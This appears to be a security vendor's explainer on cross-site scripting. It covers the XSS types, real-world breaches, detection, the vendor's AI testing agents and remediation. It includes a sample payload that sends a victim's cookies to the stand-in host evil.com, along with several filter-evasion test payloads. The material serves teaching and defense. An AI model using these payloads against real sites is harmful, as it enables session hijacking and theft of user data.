Cross-Site Scripting (XSS)

Technical Description

Cross-Site Scripting (XSS) occurs when an application includes untrusted data in its HTML output without proper encoding or sanitization, allowing an attacker to execute arbitrary JavaScript in the context of another user’s browser session. Because the malicious script runs within the trusted origin of the vulnerable application, it has full access to cookies, session tokens, DOM content, and browser APIs.

XSS is categorized into three primary types:

• Reflected XSS: The malicious payload is included in a request (typically a URL parameter) and reflected back in the immediate response. The victim must click a crafted link. Example: a search page that renders You searched for: <user_input> without encoding.
• Stored XSS: The payload is persisted server-side (in a database, file, or cache) and served to every user who views the affected page. Common injection points include comment fields, user profiles, forum posts, and support tickets. Stored XSS has a higher impact because it does not require social engineering for each victim.
• DOM-Based XSS: The vulnerability exists entirely in client-side JavaScript. The application reads data from an attacker-controllable source (e.g., document.location, window.name, postMessage) and passes it to a dangerous sink (e.g., innerHTML, eval(), document.write()). The payload never touches the server.

A simple reflected XSS example:

<!-- Vulnerable server-side template -->
<p>Welcome, ${username}</p>

<!-- Attacker supplies: <script>document.location='https://evil.com/steal?c='+document.cookie</script> -->

Modern frameworks like React, Angular, and Vue provide automatic output encoding by default, but XSS still surfaces through dangerouslySetInnerHTML, v-html, [innerHTML] bindings, and JavaScript URI schemes in href attributes.

Real-World Impact

XSS vulnerabilities have driven significant real-world compromise:

• British Airways (2018): A Magecart attack injected malicious JavaScript into the payment page, skimming credit card details from approximately 380,000 transactions. The ICO fined BA 20 million GBP under GDPR.
• Samy Worm (2005): A stored XSS worm on MySpace propagated across over one million profiles in under 20 hours, demonstrating the self-replicating potential of XSS.
• eBay (2015-2016): Persistent XSS in product listings allowed attackers to redirect buyers to phishing pages and hijack sessions at scale.

Beyond these headline cases, XSS enables session hijacking (stealing HttpOnly-missing cookies), keylogging, phishing overlays, cryptocurrency mining, and browser-based exploitation frameworks like BeEF that provide full control over a victim’s browser.

Detection Methodology

Effective XSS detection requires a combination of techniques:

1. Input/Output Tracing: Map every point where user-controlled data enters the application and every point where it is rendered in HTML, JavaScript, CSS, or URL contexts. Test each path for missing encoding.
2. Context-Specific Payloads: Standard <script>alert(1)</script> payloads are frequently blocked by WAFs. Effective testing requires context-specific payloads: attribute injection (" onfocus=alert(1) autofocus="), JavaScript context injection (';alert(1)//), and URL scheme injection (javascript:alert(1)).
3. DOM Analysis: For DOM XSS, review client-side JavaScript for dangerous source-to-sink flows. Tools like DOM Invader (Burp Suite) and browser developer tools help trace data flow.
4. CSP Evaluation: Assess Content Security Policy headers for weaknesses. A CSP with unsafe-inline or overly broad script-src directives fails to mitigate XSS.
5. Automated Scanning: Use DAST tools to spider the application and inject payloads across all parameters, but manual review remains essential for DOM-based and context-dependent XSS.

How Revaizor Discovers This

Revaizor’s AI agents detect XSS with depth that goes well beyond basic payload injection:

• Context-Aware Encoding Analysis: Revaizor’s agents analyze exactly where user input is reflected, whether in HTML body, attribute values, JavaScript blocks, CSS, or URL parameters, and select payloads appropriate to each rendering context. This catches encoding gaps that context-unaware scanners miss.
• DOM Flow Analysis: For single-page applications and JavaScript-heavy frontends, Revaizor traces client-side data flows from sources to sinks, identifying DOM XSS that never touches the server.
• Filter Evasion: When initial payloads are blocked, Revaizor’s agents intelligently mutate them: using alternative event handlers, HTML entities, Unicode encoding, and polyglot payloads to bypass input filters and WAFs.
• Chained Exploitation: Revaizor demonstrates the real impact of discovered XSS by chaining it with other findings, such as using XSS to bypass CSRF protections or to escalate from a low-privilege XSS to admin session theft.
• Framework-Specific Testing: Revaizor identifies the frontend framework in use and targets known escape hatches (dangerouslySetInnerHTML in React, v-html in Vue, bypassSecurityTrust* in Angular).

Remediation

The foundation of XSS defense is context-aware output encoding:

// React - safe by default (auto-encodes)
return <p>Welcome, {username}</p>;

// DANGEROUS - bypasses React's encoding
return <p dangerouslySetInnerHTML={{__html: username}} />;

For server-side rendering, use encoding libraries appropriate to the output context:

# Python - HTML encoding
from markupsafe import escape
output = f"<p>Welcome, {escape(username)}</p>"

Comprehensive XSS prevention includes:

• Content Security Policy: Deploy a strict CSP that prohibits inline scripts. Use nonce-based or hash-based script allowlisting: script-src 'nonce-{random}' 'strict-dynamic'.
• HttpOnly and Secure Cookies: Mark session cookies HttpOnly to prevent JavaScript access and Secure to prevent transmission over HTTP.
• Input Validation: Validate and sanitize input on the server side. For rich text, use a proven sanitization library like DOMPurify rather than regex-based filtering.
• Trusted Types: Enable the Trusted Types API in modern browsers to enforce safe DOM manipulation and eliminate DOM XSS at the API level.
• Framework Defaults: Stay within framework-provided rendering mechanisms and audit every instance where raw HTML rendering is used.